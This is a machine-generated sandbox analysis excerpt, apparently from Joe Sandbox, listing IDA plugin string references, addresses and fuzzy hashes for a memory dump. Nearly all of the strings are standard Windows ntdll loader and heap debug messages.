                                                                                                        • Part of subcall function 011C2DF0: LdrInitializeThunk.NTDLL ref: 011C2DFA
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011C0BA3
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011C0BB6
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011C0D60
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011C0D74
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 1404860816-0
                                                                                                      • Opcode ID: 5b6b9f4738d766b9e32f16d1d07d0f274482589ba70ee30ee24d95d21dd4e803
                                                                                                      • Instruction ID: 1c27d4d50ca3d77073082a8f07f42396e45fc302bf54bd1a9f4fb7e0231927a5
                                                                                                      • Opcode Fuzzy Hash: 5b6b9f4738d766b9e32f16d1d07d0f274482589ba70ee30ee24d95d21dd4e803
                                                                                                      • Instruction Fuzzy Hash: 49426C75900719DFDB29CF28C880BAAB7F4BF58704F1445ADE989DB241E770AA84CF61
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                      • API String ID: 0-379654539
                                                                                                      • Opcode ID: 4f85107bddfe685adad2cb23eeefb04528bc3e70748b8c950c9b28edaf531594
                                                                                                      • Instruction ID: 7175949b0432467fc9d52810a84c3c5a49bce24f10423afd0bf47dd69258de7f
                                                                                                      • Opcode Fuzzy Hash: 4f85107bddfe685adad2cb23eeefb04528bc3e70748b8c950c9b28edaf531594
                                                                                                      • Instruction Fuzzy Hash: B5C18B74108782CFDB19EF58D044B6AB7E4BF84708F04896AF9958B251E738DA49CF63
                                                                                                      Strings
                                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 011B855E
                                                                                                      • LdrpInitializeProcess, xrefs: 011B8422
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 011B8421
                                                                                                      • @, xrefs: 011B8591
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-1918872054
                                                                                                      • Opcode ID: 21caa39026ddaf263a737bfec87e1b551d5952c3d9c5a32139d4d07f872b01d3
                                                                                                      • Instruction ID: 29b824c101b1f21a9548b0cd655751a6ed514fcb9c113227d99f0e9a1d4111da
                                                                                                      • Opcode Fuzzy Hash: 21caa39026ddaf263a737bfec87e1b551d5952c3d9c5a32139d4d07f872b01d3
                                                                                                      • Instruction Fuzzy Hash: B3917D71508345AFD72ADF65CC80FABBAECBF94B48F40092EFA8492151E734D944CB62
                                                                                                      Strings
                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011F22B6
                                                                                                      • .Local, xrefs: 011B28D8
                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 011F21DE
                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011F21D9, 011F22B1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                      • API String ID: 0-1239276146
                                                                                                      • Opcode ID: 66c523b4120332fcadb96d7aced21000a8db338d8eef805ade98caad223a0c9a
                                                                                                      • Instruction ID: e9bf1a69f7c796f6f515268de338635f10f3000d98078c4417c7b74926841f69
                                                                                                      • Opcode Fuzzy Hash: 66c523b4120332fcadb96d7aced21000a8db338d8eef805ade98caad223a0c9a
                                                                                                      • Instruction Fuzzy Hash: ECA1DF35900229DBDB29CF68C8C8BE9B7B1BF58354F1541EAD908A7251E730EE85CF90
                                                                                                      Strings
                                                                                                      • RtlDeactivateActivationContext, xrefs: 011F3425, 011F3432, 011F3451
                                                                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 011F3456
                                                                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 011F342A
                                                                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 011F3437
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                      • API String ID: 0-1245972979
                                                                                                      • Opcode ID: 84aeaa38f0717c0cd0292cccfe01baf70c3b6dd1c68fc2068ff7e04d741f3aee
                                                                                                      • Instruction ID: d6bdc896f53c0ed33cb251a434b5efac00cc78a2bf6d7cf140db417af16ec7bf
                                                                                                      • Opcode Fuzzy Hash: 84aeaa38f0717c0cd0292cccfe01baf70c3b6dd1c68fc2068ff7e04d741f3aee
                                                                                                      • Instruction Fuzzy Hash: 1A613632650B129FD72ECF1DC881B6AB7E5FF90B50F15851DEA669B682C730E801CB91
                                                                                                      Strings
                                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 011E1028
                                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 011E106B
                                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011E10AE
                                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 011E0FE5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                      • API String ID: 0-1468400865
                                                                                                      • Opcode ID: d7c69823e93d80c2d1ba743bf098fa165b932c3316f8811b42c323509e13d361
                                                                                                      • Instruction ID: c3c8c9436ce7094e46431aa1c17a3c33b74f542a25dc53193e95c5facab5147b
                                                                                                      • Opcode Fuzzy Hash: d7c69823e93d80c2d1ba743bf098fa165b932c3316f8811b42c323509e13d361
                                                                                                      • Instruction Fuzzy Hash: EF71D2B19047059FCB25EF58C884B9B7FA8AF54BA4F404568F9488B286D734D588CFE2
                                                                                                      Strings
                                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 011F3640, 011F366C
                                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 011F365C
                                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 011F362F
                                                                                                      • LdrpFindDllActivationContext, xrefs: 011F3636, 011F3662
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                      • API String ID: 0-3779518884
                                                                                                      • Opcode ID: abe78279f785403e62e63d7723a2cf1786c3925c9d025d44b01873546728cfe4
                                                                                                      • Instruction ID: 0ac70b6a84d624bd359a44c25405e6d8a032159857fab0b019436a8c531750f9
                                                                                                      • Opcode Fuzzy Hash: abe78279f785403e62e63d7723a2cf1786c3925c9d025d44b01873546728cfe4
                                                                                                      • Instruction Fuzzy Hash: 5B315C32A102119AEF3EDB0CD8C8BFE76A8BB21654F07C029D61B57963D7A09D80C7C5
                                                                                                      Strings
                                                                                                      • LdrpDynamicShimModule, xrefs: 011EA998
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 011EA9A2
                                                                                                      • apphelp.dll, xrefs: 011A2462
                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 011EA992
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-176724104
                                                                                                      • Opcode ID: 14c1b4192118e3f7d72cafd7f1b7c80ef333b78b568ed7980c51d757cbf8db35
                                                                                                      • Instruction ID: 8a161be0aee56fd446110606256b3592e70686c364ed37525dae2eeccc39e5e2
                                                                                                      • Opcode Fuzzy Hash: 14c1b4192118e3f7d72cafd7f1b7c80ef333b78b568ed7980c51d757cbf8db35
                                                                                                      • Instruction Fuzzy Hash: 29314675600701ABEB3DDF99B88DAABBBF4FF80B14F160019E901A7245D7B09881CB80
                                                                                                      Strings
                                                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0119327D
                                                                                                      • HEAP: , xrefs: 01193264
                                                                                                      • HEAP[%wZ]: , xrefs: 01193255
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                      • API String ID: 0-617086771
                                                                                                      • Opcode ID: 1b254b6f539d2257e625b81e9f6d13a9b35e83b487a9d7fbb11ea5179445e77b
                                                                                                      • Instruction ID: 126feecf34a8544c5287ccbefab093118a7229315e5f6a83ec50e792ee075039
                                                                                                      • Opcode Fuzzy Hash: 1b254b6f539d2257e625b81e9f6d13a9b35e83b487a9d7fbb11ea5179445e77b
                                                                                                      • Instruction Fuzzy Hash: F992CD71A042499FEF29CFA8C444BAEBBF1FF48304F188059E86AAB351D735A941CF51
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                      • API String ID: 0-4253913091
                                                                                                      • Opcode ID: 036711e0473463e2ebb5db6b0c78c199b0dd2feae36ea0f1f0c1502fbc56ac39
                                                                                                      • Instruction ID: da9e3102f34fac15eed896de9ddea1fda5d4de7b29e7e460f52faa6e590c14cd
                                                                                                      • Opcode Fuzzy Hash: 036711e0473463e2ebb5db6b0c78c199b0dd2feae36ea0f1f0c1502fbc56ac39
                                                                                                      • Instruction Fuzzy Hash: F3F19E34A00A06DFEB1DCFA8C894B6AB7FAFF49704F144168E5269B341D734E981CB91
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $@
                                                                                                      • API String ID: 0-1077428164
                                                                                                      • Opcode ID: 587eab3430aad9a93747f94c10798e13419bb59731da6a8838135467c1a1a334
                                                                                                      • Instruction ID: ffcbc9117ef546dcb11f41ce3603ea55a3f5bfe61cf1c97fd908c520b9cfb03b
                                                                                                      • Opcode Fuzzy Hash: 587eab3430aad9a93747f94c10798e13419bb59731da6a8838135467c1a1a334
                                                                                                      • Instruction Fuzzy Hash: 41C2C0756087418FEB2DCF28C880BABBBE5AF88714F45892DF989C7241D735D905CB92
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                      • API String ID: 0-2779062949
                                                                                                      • Opcode ID: 3ec47ea318d535e989cb894415870fe1b91ce77bcdd706703152e4bc0d78ea02
                                                                                                      • Instruction ID: 6e365bfc94d573ffcffcf0db11ff74cd917d50f32b4543d254b6127dafb1d1cf
                                                                                                      • Opcode Fuzzy Hash: 3ec47ea318d535e989cb894415870fe1b91ce77bcdd706703152e4bc0d78ea02
                                                                                                      • Instruction Fuzzy Hash: BAA190719112299BDB39DF68CC88BEEB7B8EF44714F0005E9E908A7250DB359E84CF90
                                                                                                      Strings
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 011EA121
                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 011EA10F
                                                                                                      • LdrpCheckModule, xrefs: 011EA117
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-161242083
                                                                                                      • Opcode ID: ea8192778b4058e8ec40b28369acd0515d2fc4aaf82abcdd247778621e4aaa8b
                                                                                                      • Instruction ID: 833523bc7534be3764203cd2499ee8dcceea8add612d9892285eaf6778609081
                                                                                                      • Opcode Fuzzy Hash: ea8192778b4058e8ec40b28369acd0515d2fc4aaf82abcdd247778621e4aaa8b
                                                                                                      • Instruction Fuzzy Hash: 9471DE74A006059FDB2DDFA8D988ABEBBF4FF88608F55406DE802A7255E734AD41CB41
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                      • API String ID: 0-1334570610
                                                                                                      • Opcode ID: 327eafec8e92b7c84e37e43b1f831b2ffed55af277813c08aa2b95c022369b84
                                                                                                      • Instruction ID: a8a64fef1e46d6b4c44e16f888cab617dce1ae40a9fb23cd486e93f1f7267977
                                                                                                      • Opcode Fuzzy Hash: 327eafec8e92b7c84e37e43b1f831b2ffed55af277813c08aa2b95c022369b84
                                                                                                      • Instruction Fuzzy Hash: 3B61DD74604701DFDB6DCF28C484B6ABBF6FF49708F14855AE46A8B282D774E881CB91
                                                                                                      Strings
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 011F82E8
                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 011F82DE
                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 011F82D7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-1783798831
                                                                                                      • Opcode ID: 22876412a7b111997b8579be9a8368e229fee832c6c79638b3c6dfc6f18a4533
                                                                                                      • Instruction ID: 68492e8fb42012121c014f56b2a556b8f62c61e8d6320d60a267150769969b89
                                                                                                      • Opcode Fuzzy Hash: 22876412a7b111997b8579be9a8368e229fee832c6c79638b3c6dfc6f18a4533
                                                                                                      • Instruction Fuzzy Hash: ED412375654701ABDB29EB68EC88F9B77E8FF44654F00492AF958D3260E774E800CBD2
                                                                                                      Strings
                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0123C1C5
                                                                                                      • @, xrefs: 0123C1F1
                                                                                                      • PreferredUILanguages, xrefs: 0123C212
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                      • API String ID: 0-2968386058
                                                                                                      • Opcode ID: dc0884ad8bfc3080f1360bc5cf6dffe56f03d8ea03215b20f6d35d24464af5b8
                                                                                                      • Instruction ID: 817163a943069fafa1bdcc969e133aef85bb68bbd98b3e48533dc4e23f770fdd
                                                                                                      • Opcode Fuzzy Hash: dc0884ad8bfc3080f1360bc5cf6dffe56f03d8ea03215b20f6d35d24464af5b8
                                                                                                      • Instruction Fuzzy Hash: 714188B1E1021AEBDF15DBD8C841FEEBBB8AB54704F04406BEA05F7240D7749A54CB50
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                      • API String ID: 0-1373925480
                                                                                                      • Opcode ID: 58d879cc591f5fb2e8aee4ae4aca200beaae8bba67e3f154fa9b8a9c0e251b0e
                                                                                                      • Instruction ID: d3b9a7f8b0fae6b8fe8e33c8a857a1fa6f887ece961212613287fa4807020644
                                                                                                      • Opcode Fuzzy Hash: 58d879cc591f5fb2e8aee4ae4aca200beaae8bba67e3f154fa9b8a9c0e251b0e
                                                                                                      • Instruction Fuzzy Hash: AA4137319202998BEB26EFE8C844BECBBF4FF65344F24045ADA15EB785D7748941CB50
                                                                                                      Strings
                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01204888
                                                                                                      • LdrpCheckRedirection, xrefs: 0120488F
                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01204899
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                      • API String ID: 0-3154609507
                                                                                                      • Opcode ID: 5b43511dfeab5f0bc44f7e1b183252c987719ea330ca9d0bb9a0be93751d44eb
                                                                                                      • Instruction ID: bcaa9145c50f7bee2a6292d0d9a30b8d1fda5ab39b806896a909076bb6c2090e
                                                                                                      • Opcode Fuzzy Hash: 5b43511dfeab5f0bc44f7e1b183252c987719ea330ca9d0bb9a0be93751d44eb
                                                                                                      • Instruction Fuzzy Hash: 3541D632A246928FDB27EE18D841A277BE4EF89650B05875DEF44972A3D330D900CB81
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                      • API String ID: 0-2558761708
                                                                                                      • Opcode ID: 87b0063972e84fc66c1e75e38434e327907282467559181bd95b213d009ad381
                                                                                                      • Instruction ID: 89a905a982cd38490cbcaf836d3d3d970e73142feb94e315fe150baa1bf3f33f
                                                                                                      • Opcode Fuzzy Hash: 87b0063972e84fc66c1e75e38434e327907282467559181bd95b213d009ad381
                                                                                                      • Instruction Fuzzy Hash: 3511E135314502DFDBADDA18C858B76B7EAEF44619F19811DF426CB251EB30D840C756
                                                                                                      Strings
                                                                                                      • LdrpInitializationFailure, xrefs: 012020FA
                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01202104
                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 012020F3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                      • API String ID: 0-2986994758
                                                                                                      • Opcode ID: 598b7dc53a7c539fe5314f7f572dacbcb47f1d612fabdadb6b9553c096698843
                                                                                                      • Instruction ID: 8f849098f9232bf2b8dd32b789b5dea56b944182784586a996131a69bc9977be
                                                                                                      • Opcode Fuzzy Hash: 598b7dc53a7c539fe5314f7f572dacbcb47f1d612fabdadb6b9553c096698843
                                                                                                      • Instruction Fuzzy Hash: 4AF02834650309FFE728E60CDC0AF96B76CEB80B44F100019F700772C6D3B0A510CA81
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ___swprintf_l
                                                                                                      • String ID: #%u
                                                                                                      • API String ID: 48624451-232158463
                                                                                                      • Opcode ID: 07e9c1934da78a5e58ba22929922c062c59478839b5d5e593aa0af72a81d126e
                                                                                                      • Instruction ID: 90af4c9ff4a4605330c999c1db9f21a4b949978a13fd9d315590410ab7e5f412
                                                                                                      • Opcode Fuzzy Hash: 07e9c1934da78a5e58ba22929922c062c59478839b5d5e593aa0af72a81d126e
                                                                                                      • Instruction Fuzzy Hash: 41716871A0054A9FDF09DFA8C994BAEB7F8BF18744F154069E910E7251EB34EE01CBA0
                                                                                                      Strings
                                                                                                      • LdrResSearchResource Enter, xrefs: 0118AA13
                                                                                                      • LdrResSearchResource Exit, xrefs: 0118AA25
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                      • API String ID: 0-4066393604
                                                                                                      • Opcode ID: 313178a1213ece0f17064c2fa844a3925744fb853620cb95f2459e888e7a2458
                                                                                                      • Instruction ID: 3f57aab0e050e5b76c55007acd758ddea7a37ea53b4976a385ea722482cb4c3d
                                                                                                      • Opcode Fuzzy Hash: 313178a1213ece0f17064c2fa844a3925744fb853620cb95f2459e888e7a2458
                                                                                                      • Instruction Fuzzy Hash: 69E19E71A00619AFEB2EDFD8D994BAEBBB9BF04310F15842AE911E7241E734D940CF51
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: `$`
                                                                                                      • API String ID: 0-197956300
                                                                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                      • Instruction ID: 750a3aaf8b7aba02703573b67bb1f2ca9efa7a8e226da7f7eb40aaddaf0fab61
                                                                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                      • Instruction Fuzzy Hash: D6C1C1312643429FEB29CF28C841B6BBBE5EFD4718F084A2DF6968B291D774D505CB81
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: Legacy$UEFI
                                                                                                      • API String ID: 2994545307-634100481
                                                                                                      • Opcode ID: 828aea271f5b98ef9be5b3fab57d48122e5db9a13027fc122f3b6ca7fea06aa5
                                                                                                      • Instruction ID: b41beb10240b5be1825a6150513c41330f92b6e7adf972c565bed64952db458c
                                                                                                      • Opcode Fuzzy Hash: 828aea271f5b98ef9be5b3fab57d48122e5db9a13027fc122f3b6ca7fea06aa5
                                                                                                      • Instruction Fuzzy Hash: C9616C72E017199FDB29DFA8C850BAEBBB9FB44704F15412DE649EB261D731E900CB50
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.1924816273.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_1150000_72STaC6BmljfbIQ.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @$MUI
                                                                                                      • API String ID: 0-17815947
                                                                                                      • Opcode ID: 958db323b8f83119a21a249cdc43d32bb752a430161c93387a85d0619e1516b5
                                                                                                      • Instruction ID: 7bdf8486b1bb79785d4fb68244c852d443d5eda3b813266caa375afa44e65522
                                                                                                      • Opcode Fuzzy Hash: 958db323b8f83119a21a249cdc43d32bb752a430161c93387a85d0619e1516b5
